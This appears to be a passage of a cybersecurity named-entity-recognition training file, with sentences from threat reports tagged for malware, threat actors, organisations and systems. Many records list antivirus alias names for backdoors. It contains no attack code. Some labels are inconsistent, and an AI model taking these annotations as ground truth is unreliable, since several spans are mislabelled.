{"text": "As such, this new attack represents a dangerous new hybrid combining the work of a notorious cyber criminal gang with Chinese cyber espionage group to attack a financial services firm.", "spans": {"THREAT_ACTOR: cyber criminal gang": [[93, 112]], "THREAT_ACTOR: Chinese cyber espionage group": [[118, 147]], "ORGANIZATION: financial services firm.": [[160, 184]]}, "info": {"id": "cyner2_train_005296", "source": "cyner2_train"}}
{"text": "FireEye recently discovered a new variant of a point of sale POS malware family known as NewPosThings.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: new variant of a point of sale POS malware family": [[30, 79]], "MALWARE: NewPosThings.": [[89, 102]]}, "info": {"id": "cyner2_train_005297", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Imiserv.245760 Trojan.Imiserv.c Trojan/Imiserv.c Trojan.Win32.Malware.1 Win32/Imiserv.C Adware.IEPlugin Trojan.Win32.Imiserv.c Trojan.Win32.Imiserv.B TrojWare.Win32.Imiserv.C Trojan.Win32.Imiserv.c TROJ_IMISERVER.A Trojan.Win32.Imiserv!IK Trojan.Win32.Imiserv.B Win-Trojan/Imiserv.245760 Trojan.Win32.Imiserv.c Trojan.Imiserv.G Trojan.Win32.Imiserv W32/Imiserv.C!tr Trj/Imiserv.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005298", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Clicker.Win32.VB!O Trojan.VB.al3 Trojan.VB.Win32.56708 W32/Clicker.VB.fli TROJ_LNKIEB.SMI Win32/VB.BHE TROJ_LNKIEB.SMI Win.Trojan.Clicker-4258 Trojan-Clicker.Win32.VB.fli Trojan.Win32.VB.cnwqrx Trojan.Win32.A.Clicker.36892 Win32.Trojan.Vb.Angm TrojWare.Win32.Injector.AMXL TrojanClicker.VB.ffy TR/Lnkiebes.A.6 Trojan[Clicker]/Win32.VB Trojan.Buzy.D6DC Trojan-Clicker.Win32.VB.fli Trojan:Win32/Lnkiebes.A Trojan/Win32.VB.R5515 Trojan.VBRA.03765 Win32/Spy.Chekafev.AD Trojan.CL.VB!fBU5Dy6sJXo Trojan-Clicker.Win32.VB W32/VB.F!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005299", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.Small.9216.J Trojan/TopAntiSpyware.i TROJ_ANTISPY.B Win32.Trojan.WisdomEyes.16070401.9500.9859 W32/Trojan.QAS Adware.Topantispyware Win32/DlExaw.E TROJ_ANTISPY.B Html.Trojan.ClickerSmall-71 Trojan.Win32.TopAntiSpyware.j Trojan.Win32.TopAntiSpyware.ehkl Troj.W32.TopAntiSpyware.j!c Win32.Trojan.Topantispyware.Wsju TrojWare.Win32.TopAntiSpyware.~BAAB Trojan.DownLoader.2049 BehavesLike.Win32.Virut.zh Trojan.Win32.TopAntiSpyware.J W32/Trojan.MSMO-2253 Trojan/TopAntiSpyware.c Trojan/Win32.TopAntiSpyware Trojan:Win32/TopAntiSpyware.J Trojan.Win32.TopAntiSpyware.j Trojan/Win32.Adload.C82279 Adware.WarSpy.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005300", "source": "cyner2_train"}}
{"text": "Locky .diablo6 campaign", "spans": {"MALWARE: Locky .diablo6": [[0, 14]], "THREAT_ACTOR: campaign": [[15, 23]]}, "info": {"id": "cyner2_train_005303", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Injector.FC.81 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Dwn.dzugvc TrojWare.MSIL.Disfa.B Trojan.DownLoader17.15248 BehavesLike.Win32.Trojan.fc Trojan.MSIL.Crypt Trojan.Razy.D1AD5 Spyware.Imminent MSIL/Kryptik.EAN!tr Win32/Trojan.982", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005308", "source": "cyner2_train"}}
{"text": "Using this and other dangerous applications uploaded by Linux.PNScan.1 to the compromised device, cybercriminals can hack administrative control panel of PHPMyAdmin, which is used to manage relational databases, and brute-force authentication credentials to get unauthorized access to various devices and servers via the SSH protocol.", "spans": {"SYSTEM: dangerous applications": [[21, 43]], "SYSTEM: compromised device,": [[78, 97]], "VULNERABILITY: PHPMyAdmin,": [[154, 165]], "VULNERABILITY: brute-force authentication credentials": [[216, 254]]}, "info": {"id": "cyner2_train_005309", "source": "cyner2_train"}}
{"text": "During our analysis of this malware we uncovered interesting code paths and other artifacts that may indicate a Mac or Unix variant of this same tool also exists.", "spans": {"MALWARE: malware": [[28, 35]], "SYSTEM: Mac": [[112, 115]], "SYSTEM: Unix variant": [[119, 131]], "MALWARE: tool": [[145, 149]]}, "info": {"id": "cyner2_train_005310", "source": "cyner2_train"}}
{"text": "Aside from this campaign's motivation, what grabbed our attention was the way it utilizes pCloud, a free cloud service, for data storage and communication.", "spans": {"THREAT_ACTOR: this campaign's": [[11, 26]], "SYSTEM: a free cloud service,": [[98, 119]], "SYSTEM: data storage": [[124, 136]], "SYSTEM: communication.": [[141, 155]]}, "info": {"id": "cyner2_train_005312", "source": "cyner2_train"}}
{"text": "In this third part of Unit 42's Cybercrime Underground blog series, we're taking a slightly different approach.", "spans": {"ORGANIZATION: Unit 42's Cybercrime Underground": [[22, 54]]}, "info": {"id": "cyner2_train_005313", "source": "cyner2_train"}}
{"text": "These deceptive sites are carefully crafted to trick unsuspecting users into downloading and executing malware, which can result in stealing the victim's sensitive data.", "spans": {"MALWARE: malware,": [[103, 111]]}, "info": {"id": "cyner2_train_005314", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PSW.Win32.QQPass!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/QQPass.ZQ Trojan-PSW.Win32.QQPass.gkd Trojan.Win32.QQPass.vwban Backdoor.W32.DsBot.l5eP Trojan.PWS.Lineage.10130 BehavesLike.Win32.RAHack.cm Trojan/PSW.QQPass.fng Trojan[GameThief]/Win32.Lmir Win32.Troj.QQPswT.bs.116858 Trojan.Graftor.Elzob.D486F Trojan.Tencent/Variant Trojan-PSW.Win32.QQPass.gkd SScope.Trojan-PSW.Win32.Delf.bav Worm.Win32.AutoRun", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005316", "source": "cyner2_train"}}
{"text": "In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms.", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: a phishing campaign": [[39, 58]], "ORGANIZATION: seven global law and investment firms.": [[78, 116]]}, "info": {"id": "cyner2_train_005319", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Injector Trojan.Win32.Dwn.edybnj Trojan.Win32.Z.Razy.328168 Win32.Trojan.Falsesign.Phqf Trojan.DownLoader21.41335 Trojan.MSIL.Crypt TR/Dropper.MSIL.inryd Trojan.Razy.D11CB7 Trojan:Win32/Censer.A Trj/CI.A MSIL/Kryptik.GLN!tr Win32/Trojan.Dropper.32d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005320", "source": "cyner2_train"}}
{"text": "A strong relationship between previously identified malware samples attributed to these campaigns and the newly discovered samples examined in this report.", "spans": {"MALWARE: malware samples": [[52, 67]], "MALWARE: campaigns": [[88, 97]]}, "info": {"id": "cyner2_train_005321", "source": "cyner2_train"}}
{"text": "We have already seen large campaigns targeting Europe and other parts of the world in 2014 and 2015.", "spans": {"THREAT_ACTOR: campaigns": [[27, 36]]}, "info": {"id": "cyner2_train_005322", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Chet.20484 W32/Chet.c@MM W32/Chet.e Trojan.Win32.Chet.emgc W32.Chet@mm Win32/Chet.E Email-Worm.Win32.Chet.e I-Worm.Chet!g52sFTlFeyo I-Worm.Win32.Chet.20484.C[h] Worm.Win32.Chet.E Win32.HLLM.Otchet.20484 Worm.Chet.Win32.4 W32/Chet.c@MM W32/Risk.ZNRZ-7753 I-Worm/Chet.a W32/Chet.E!worm Worm[Email]/Win32.Chet W32.W.Chet.e!c Win32/Chet.worm.20484.C Worm:Win32/Chet.E@mm Win32/Chet.E Worm.Chet Win32.Worm-email.Chet.Szlk Email-Worm.Win32.Chet I-Worm/Chet.C Worm.Win32.Chet.e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005323", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Downloader.Small.Win32.7020 Trojan/Downloader.Small.bdc Win32.Trojan.WisdomEyes.16070401.9500.9963 W32/Downloader.DXO TROJ_TENGADL.A Win.Downloader.Tenga-1 Trojan-Downloader.Win32.Small.bdc Trojan.Win32.Small.glqe Trojan.Win32.Downloader.3072.B Troj.Downloader.W32.Small.bdc!c TrojWare.Win32.TrojanDownloader.Small.BDC Trojan.DownLoader.3449 TROJ_TENGADL.A W32/Downloader.GWIH-8231 TrojanDownloader.Small.bqb W32.Malware.Downloader TR/Dldr.Small.bdc.2 Trojan[Downloader]/Win32.Small TrojanDownloader:Win32/Gael.A Trojan-Downloader.Win32.Small.bdc Trojan/Win32.Downloader.C22709 Trojan-Downloader.Win32.Utenti Trj/Downloader.DNX Win32/TrojanDownloader.Small.BDC Win32.Trojan-downloader.Small.Wrpx Trojan.DL.Small!rnjf8eX9OeE Trojan-Downloader.Win32.Small W32/Small.BDC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005324", "source": "cyner2_train"}}
{"text": "In order to infect the victims, the attackers distributed spear-phishing email, which purports to have been sent from NIC's Incident response team, the attackers spoofed an email id that is associated with Indian Ministry of Defence to send out email to the victims.", "spans": {"ORGANIZATION: victims,": [[23, 31]], "THREAT_ACTOR: attackers": [[36, 45], [152, 161]], "ORGANIZATION: NIC's Incident response team,": [[118, 147]], "ORGANIZATION: Indian Ministry of Defence": [[206, 232]], "ORGANIZATION: victims.": [[258, 266]]}, "info": {"id": "cyner2_train_005325", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Paramcud TROJ_UMPER.SMSE Backdoor.Win32.3Para.e TROJ_UMPER.SMSE W32/Adware.KYIR-6825 Trojan.Adware.Symmi.D781 Trojan:Win32/Umper.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005326", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/IllNotifier.d TROJ_ILLNOTIF.D Win32.Trojan.WisdomEyes.16070401.9500.9964 TROJ_ILLNOTIF.D Trojan-Notifier.Win32.IllNotifier.d Trojan.Win32.IllNotifier.diak Trojan.Win32.IllNotifier.4096 Troj.Notifier.W32.IllNotifier.d!c Win32.TrojanNotifier.IllNotif.D Trojan.Illnot TrojanNotifier.IllNotifier.b TR/IllNotifier.D.1 Trojan-Notifier.Win32.IllNotifier.d Trojan:Win32/IllNotif.D TrojanNotifier.IllNotifier Trj/Notifier.C Win32/TrojanNotifier.IllNotif.D Trojan.IllNotifier!nSHIqsfdJ3I W32/IllNotifier.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005328", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.IrcbotFamTMS.Worm W32/CubsPewt.worm Backdoor.RBot.Win32.1857 Trojan.Heur.VP2.Cy2aaWGg!Jbi WORM_CUBSPEW.SMD Win32.Trojan.WisdomEyes.16070401.9500.9943 W32/Worm.ATKB W32.SillyFDC Win32/Cubspewt.E WORM_CUBSPEW.SMD Win.Trojan.Mybot-11593 Trojan.Win32.Rbot.baglt Win32.Worm.Autorun.Wqwe Win32.HLLW.Autoruner.7400 BehavesLike.Win32.Dropper.gc W32/Worm.ZJYN-5347 Backdoor/RBot.jco Trojan[Backdoor]/Win32.Rbot Worm:Win32/Cubspewt.A Backdoor.Win32.IRCBot.425984.C Worm/Win32.IRCBot.R7984 Backdoor.Rbot Backdoor.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005331", "source": "cyner2_train"}}
{"text": "Threat actors are now using this previously unseen executable, created by Samsung, to load variants of the PlugX Trojan.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "ORGANIZATION: Samsung,": [[74, 82]], "MALWARE: PlugX Trojan.": [[107, 120]]}, "info": {"id": "cyner2_train_005333", "source": "cyner2_train"}}
{"text": "Poison Ivy has a convenient graphical user interface GUI for managing compromised hosts and provides easy access to a rich suite of post-compromise tools.", "spans": {"MALWARE: Poison Ivy": [[0, 10]], "SYSTEM: hosts": [[82, 87]], "MALWARE: post-compromise tools.": [[132, 154]]}, "info": {"id": "cyner2_train_005334", "source": "cyner2_train"}}
{"text": "A direct trail was established over a period of years that would lead competent researchers to finger CN operators as responsible for this new activity as well.", "spans": {"ORGANIZATION: researchers": [[80, 91]], "THREAT_ACTOR: CN operators": [[102, 114]]}, "info": {"id": "cyner2_train_005335", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Trojan.Downloader.JKFJ Dropped:Trojan.Downloader.JKFJ Trojan.Downloader.JKFJ Trojan.DownLoad.6115 Dropped:Trojan.Downloader.JKFJ Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005336", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Llac BKDR_COMDAR.SMI Win32.Trojan.WisdomEyes.16070401.9500.9967 BKDR_COMDAR.SMI Win.Trojan.Killav-107 Trojan.Win32.Llac.dpis Trojan.Win32.Hupigon.bjsvj Trojan.Win32.Z.Hupigon.631808 Troj.W32.Llac!c Backdoor.Win32.Amtar.~dkc1 BackDoor.Comet.345 Backdoor.Hupigon.Win32.87925 BehavesLike.Win32.Dropper.jh Trojan/Scar.bmme Trojan[Backdoor]/Win32.Hupigon TrojanDownloader:Win32/Hupigon.C Trojan.Win32.Llac.dpis Trojan/Win32.Hupigon.C98989 TScope.Trojan.Delf Win32.Trojan.Llac.Swuk Virus.Win32.Delf.DTW Win32/Trojan.713", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005337", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Backdoor.SchoolBus.C Backdoor.Schoolbus BackDoor-BL.dr Backdoor.W32.Schoolbus!c W32/Backdoor2.XLL Backdoor.Trojan BKDR_SCHOOLBUS.C Dropped:Backdoor.SchoolBus.C Backdoor.Win32.SchoolBus.15 Dropped:Backdoor.SchoolBus.C Backdoor.Win32.Z.Schoolbus.257515 Dropped:Backdoor.SchoolBus.C Dropped:Backdoor.SchoolBus.C BackDoor.SchoolBus Email-Worm.Win32.GOPworm.196 BKDR_SCHOOLBUS.C BehavesLike.Win32.Dropper.dc W32/Backdoor.CDSN-7186 BDS/SchoolBus.C.DR.8 Backdoor:Win32/Schoolbus.C.dr Backdoor.Win32.SchoolBus.15 Backdoor/Win32.Trojan.C197204 Dropped:Backdoor.SchoolBus.C Email-Worm.Win32.GOPworm.196 Backdoor.Schoolbus Bck/Iroffer.BG Backdoor.SchoolBus.C Win32/SchoolBus.C Win32.Backdoor.Schoolbus.pfo Backdoor.SchoolBus.C Win32/Trojan.374", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005338", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.JKVR Backdoor.Pingbed Trojan.Downloader.JKVR Win32.Trojan.WisdomEyes.16070401.9500.9987 W32/Backdoor2.HAEI BKDR_PINGBED.A Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Downloader.JKVR Trojan.Downloader.JKVR BKDR_PINGBED.A BehavesLike.Win32.PWSOnlineGames.pt W32/Backdoor.DODB-2037 Backdoor:Win32/Pingbed.A Trojan/Win32.Dllbot.R15525 Trojan.Downloader.JKVR Win32/Trojan.Downloader.d4d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005339", "source": "cyner2_train"}}
{"text": "Mad Max is a targeted trojan that uses a domain generation algorithm DGA", "spans": {"MALWARE: Mad Max": [[0, 7]], "MALWARE: targeted trojan": [[13, 28]]}, "info": {"id": "cyner2_train_005340", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9987 Win.Trojan.Enfal-36 DLOADER.Trojan BehavesLike.Win32.BadFile.qt Trojan.Heur.EED22D0 Backdoor.Win32.PcClient", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005342", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.PgxviewI.Trojan Win32.Worm.Donked.b Win32/Donked.A Win.Worm.Autorun-7941 Win32.Worm.Donked.A Trojan.Disabler.64 W32/Autorun.worm.he Worm:Win32/Donked.A Win32/Autorun.worm.40960.DM W32/Autorun.worm.he I-Worm.Donked.A Win32/Donked.A Worm.Donked!DgcwScp6hHo W32/Donked.BB!tr Win32/Trojan.88a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005343", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MulDrop7.11292 Trojan.Injector.Win32.494093 Trojan.Fsysna.guw TR/AD.NETCryptor.xslwu Trojan.MSILPerseus.D15D13 Trojan/Win32.MSILKrypt.R210547 Trj/GdSda.A Trojan.Injector!cLW3TSG0Mi8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005344", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Flashy.Trojan Packed.Win32.TDSS!O Trojan.Disabler.Win32.3 Trojan/Disabler.i WORM_FLASHY.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Glupzy.A Win32/Glupzy.A WORM_FLASHY.SM Win.Trojan.Disabler-3 Trojan.Win32.Disabler.i Trojan.Win32.Disabler.reit Trojan.Win32.Disabler.21185 Win32.Trojan.Fakedoc.Auto Trojan.Flashy BehavesLike.Win32.Dropper.cz Trojan/Disabler.al TR/Disabler.I Trojan/Win32.Disabler Worm:Win32/Glupzy.A W32.W.VB.kZz1 Trojan.Win32.Disabler.i Trojan/Win32.HDC.C51559 Trojan.Flasher.2913 RiskWare.Tool.CK Win32/Disabler.I Trojan.Disabler!sfd9qm983h8 Virus.Win32.Virut W32/Disabler.I!tr Trj/Flashy.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005345", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike.Win32.Conficker.mc Trojan.Razy.D1B4E2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005346", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Trojan.Gamex.A Android.FakeUpdate.B Android.Trojan.Gamex.A Android.Trojan.Gamex.e AndroidOS/Gamex.A Android.Mobigapp A.H.Rog.Gamex.B Trojan:Android/Gamex.C Android.DownLoader.1561 AndroidOS/Gamex.A ANDROID/Mobigapp.A Android.Trojan.Gamex.A Android-Trojan/Gamex.1cbc Trojan.AndroidOS.FakeSite.A Android.Trojan.Gamex.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005349", "source": "cyner2_train"}}
{"text": "The ransomeware also leaves the notes README_HOW_TO_UNLOCK.html and README_HOW_TO_UNLOCK.txt throughout the system.", "spans": {"MALWARE: ransomeware": [[4, 15]], "SYSTEM: system.": [[108, 115]]}, "info": {"id": "cyner2_train_005351", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Jorik.Banker!O Trojan.Zusy.D689D Win32.Trojan.WisdomEyes.16070401.9500.9545 W32/Trojan.WDRL-5915 Trojan-Banker.Win32.TuaiBR.edq Trojan.Win32.Zusy.dckfkl Troj.W32.Jorik.Banker.dnz!c Win32.Trojan-banker.Tuaibr.Wlfg Trojan.Jorik.Win32.164763 TR/Spy.Banker.UV Trojan/Win32.Banker TrojanProxy:MSIL/Banker.G Trojan-Banker.Win32.TuaiBR.edq Trojan/Win32.Proxy.C910983 MSIL/Banker.AK!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005352", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Boaxxe.E Win32.Trojan.WisdomEyes.16070401.9500.9985 TROJ_ZBOT.SMUI Packed.Win32.Krap.iu Win32.Trojan.Falsesign.Dvgf TrojWare.Win32.Kryptik.ZLB Trojan.DownLoad3.832 TROJ_ZBOT.SMUI Trojan.Win32.Cleaman Trojan/Menti.sbs Trojan[Packed]/Win32.Krap Trojan:Win32/Cleaman.B Packed.Win32.Krap.iu Trojan/Win32.Menti.R20809 SScope.Malware-Cryptor.SB.01798 Bck/Qbot.AO Trojan.Conjar.8 Trojan.Kryptik!pGFdk5FNPhE Win32/Trojan.0ce", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005355", "source": "cyner2_train"}}
{"text": "A backdoor also known as: SMSFraud.d Win32/Hoax.ArchSMS.KC Hoax.Win32.ArchSMS.hsgx Trojan.SMSSend.520 SMSFraud.d Hoax/Win32.ArchSMS Program:Win32/Pameseg.U Hoax.Win32.ArchSMS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005359", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ShitOverVBx.PE Trojan.Win32.Cosmu!O W32.Lamer.EL3 Trojan.Downloader Downloader.VB.Win32.9689 Troj.Downloader.W32.VB.l4ji Trojan/Downloader.VB.eex TROJ_DLOADR.SMM Win32.Virus.VBbind.a W32/Worm.BAOX W32.Besverit Win32/VB.P TROJ_DLOADR.SMM Virus.Win32.Lamer.el Trojan.Win32.VB.csnpye Worm.Win32.VB.kp Win32.HLLW.Autoruner.6014 BehavesLike.Win32.Dropper.rh W32/Worm.EMYS-2108 Trojan/VB.kro WORM/VB.NVA Virus/Win32.Lamer.el Trojan:Win32/Dorv.A Trojan.Win32.Downloader.90650.B Virus.Win32.Lamer.el Win32.Application.Unwanted.B Dropper/Win32.Cosmu.R14017 SIM.Trojan.VBO.0859 Trojan.Cosmu Win32/AutoRun.VB.JP Worm.VB.FMYJ Worm.Win32 W32/OverDoom.A Worm.Win32.VB.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005360", "source": "cyner2_train"}}
{"text": "Starting on October 28, we found that these two vulnerabilities were being targeted by the Angler and Nuclear exploit kits.", "spans": {"VULNERABILITY: vulnerabilities": [[48, 63]], "MALWARE: Angler": [[91, 97]], "MALWARE: Nuclear exploit kits.": [[102, 123]]}, "info": {"id": "cyner2_train_005363", "source": "cyner2_train"}}
{"text": "Unfortunately, the attack is still active and the number of victims has been increasing.", "spans": {}, "info": {"id": "cyner2_train_005364", "source": "cyner2_train"}}
{"text": "An email with the subject of UK Fuels Collection pretending to come from invoices@ebillinvoice.com with a malicious word doc attachment delivers some sort of malware.", "spans": {"MALWARE: malicious word doc": [[106, 124]], "MALWARE: malware.": [[158, 166]]}, "info": {"id": "cyner2_train_005366", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9805 Trojan.MulDrop7.45925 BehavesLike.Win32.Trojan.hc W32/Trojan.OQZZ-1308 TR/Ransom.JigsawLocker.dneeo Trojan.MSILPerseus.D1E5AF Ransom:MSIL/JigsawLocker.A Ransom.Jigsaw Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005367", "source": "cyner2_train"}}
{"text": "A backdoor also known as: WS.Reputation.1 TROJ_SPNR.08JS11 TROJ_SPNR.08JS11 Trojan:MSIL/Reploxar.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005368", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Downloader.EAC O97M.Downloader.GQ W97M.Downloader.EAC W2KM_FAREIT.YYSVN W97M.Downloader.EAC W97M.Downloader.EAC Trojan.Script.MLW.egddty W97M.Downloader.EAC W97M.Downloader.EAC W2KM_FAREIT.YYSVN W97M/Downloader.bhi HEUR/Macro.Downloader Trojan:O97M/Macrobe.D W97M.Downloader.EAC W97M/Downloader.bhi virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005369", "source": "cyner2_train"}}
{"text": "This group is known to have targeted U.S. government agencies, defense contractors, aerospace firms and foreign militaries since 2009.", "spans": {"THREAT_ACTOR: group": [[5, 10]], "ORGANIZATION: U.S. government agencies, defense contractors, aerospace firms and foreign militaries": [[37, 122]]}, "info": {"id": "cyner2_train_005370", "source": "cyner2_train"}}
{"text": "Unfortunately, at any given point in time, there are thousands of sites that allow users to illegally stream pirated content, and they often manage to devise strategies that allow them to monetize their illegally sourced content with programmatic advertising.", "spans": {}, "info": {"id": "cyner2_train_005371", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Downloader.Small.Win32.7325 Dialer.DialerPlatformLimited Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Downloader.AULY Trojan.Packed.14 Win32/TrojanDownloader.Small.CXG TROJ_OBFUSCAT.EY Win.Trojan.Dialer-266 Trojan.Win32.Busky.cvqace TrojWare.Win32.TrojanDownloader.Small.CXG Trojan.DownLoader.based Trojan-Downloader.Win32.Busky W32/Downloader.MCGP-7971 Trojan[Downloader]/Win32.Busky TrojanDownloader:Win32/Beenut.A Win32/SillyDl.PW MalwareScope.Trojan-Downloader.Obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005372", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Potential.A Trojan/DownloaderKrap.ii Trojan.Zbot.6 Win32.Trojan.Kryptik.b W32.Priter Win32/SillyDl.YFM Packed.Win32.Krap.ii Virus.Win32.CrazyPrier.lrspi Packer.W32.Krap!c TrojWare.Win32.PkdKrap.II BehavesLike.Win32.HLLPPhilis.nh Packed.Krap.dqky Win32.Troj.fo.40176 TrojanDownloader:Win32/Potentialdownloader.A Packed.Win32.Krap.ii Trojan/Win32.Downloader.R3327 Trojan.Win32.Small.pck Trojan.Win32.Crazyman1649.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005374", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Lassab.A@mm Email-Worm.Win32!O W32/Lassa.b Worm.Lassorm.Win32.1 W32/Lassa.B Win32.Lassab.E90817 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Lassie.B Win.Worm.Lassorm-1 Win32.Lassab.A@mm Email-Worm.Win32.Lassorm Win32.Lassab.A@mm Trojan.Win32.Lassorm.emyb Win32.Lassab.A@mm Win32.Lassab.A@mm W32/Lassa.b Email-Worm.Win32.Lassorm Worm[Email]/Win32.Lassorm Worm:Win32/Lassab.A@mm Email-Worm.Win32.Lassorm Worm/Win32.Lassorm.C1532344 Win32.Lassab.A@mm Worm.Lassorm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005375", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.DF97 Win32.Zafi.B@mm W32/Zafi.b@MM W32.W.Otwycal.l4av Win32.Zafi.B@mm Win32.Zafi.E2C45E Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Erkez.B@mm Email-Worm.Win32.Zafi.b Trojan.Win32.Zafi.icie Win32.Zafi.B@mm Win32.Hazafi.30720 BehavesLike.Win32.RAHack.mm I-Worm/Zafi.b Worm[Email]/Win32.Zafi Worm:Win32/Zafi.B@mm Email-Worm.Win32.Zafi.b Win32.Zafi.B@mm Win32.Zafi.B@mm W32/Zafi.B.worm Win32/Zafi.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005376", "source": "cyner2_train"}}
{"text": "TA569 is a prolific threat actor primarily known for its deployment of website injections leading to a JavaScript payload known as SocGholish.", "spans": {"THREAT_ACTOR: TA569": [[0, 5]], "THREAT_ACTOR: prolific threat actor": [[11, 32]], "MALWARE: JavaScript payload": [[103, 121]], "MALWARE: SocGholish.": [[131, 142]]}, "info": {"id": "cyner2_train_005377", "source": "cyner2_train"}}
{"text": "Here is a nice example that my spam trap captured a few days ago.", "spans": {}, "info": {"id": "cyner2_train_005379", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Bebloh.Win32.427 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Injector.CMX TROJ_HPISDA.SM2 Trojan.Win32.NaKocTb.eiktob Trojan.Win32.Inject.213504 Troj.W32.Inject.tn8S BackDoor.Bebloh.272 TROJ_HPISDA.SM2 BehavesLike.Win32.Downloader.ch W32/Injector.UCTI-2382 Trojan.Inject.tpn Trojan/Win32.Inject Trojan.Strictor.D1C966 Backdoor:Win32/Carrotime.A Trojan/Win32.Inject.C1667127 Trj/RansomCrypt.J W32/Kryptik.FJVT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005381", "source": "cyner2_train"}}
